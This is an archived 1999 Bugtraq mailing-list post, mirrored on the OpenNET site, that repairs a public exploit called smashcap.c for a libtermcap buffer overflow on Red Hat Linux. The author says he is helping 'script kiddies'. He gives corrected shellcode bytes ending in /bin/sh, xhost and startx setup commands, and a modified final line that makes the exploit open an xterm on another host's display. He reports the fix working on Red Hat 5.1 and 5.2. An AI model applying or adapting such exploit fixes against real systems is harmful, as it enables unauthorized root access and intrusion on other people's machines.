The OpenNET Project / Index page

libtermcap exploit fix ... smashcap.c


Date: Mon, 23 Aug 1999 01:18:16 +0300
From: Hudin Lucian <luci@WILD.TRANSART.RO>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: libtermcap exploit fix ... smashcap.c

 Hi, since bugtraq is a full-disclosure list, let's
help the script kiddies a bit and scare the sysadms a little bit more...
 To make the smashcap.c work, all you have to do is remove one
0xff character before /bin/sh in the shellcode
so the line would be:
  "\x80\xe8\xdc\xff\xff\xff/bin/sh"
instead of :
  "\x80\xe8\xdc\xff\xff\xff\xff/bin/sh"

also, you'll have to be on console running x to exploit it, but
 if you have another box where you can start x then it's ok
myhost$ startx;xhost +victim.com
victim$ ./smashcap
and modify the last line from the smashcap.c into
	execl("/usr/X11R6/bin/xterm","xterm", "-display",
"victim.com:0", 0);

 well, it works on most redhats (tested on 5.1 and 5.2)
on Slackware it sigsegv's, you need to work a little bit, sorry I don't
have a Slackware box to work on.

regards, lucysoft

Created 1996-2003 by Maxim Chirkov  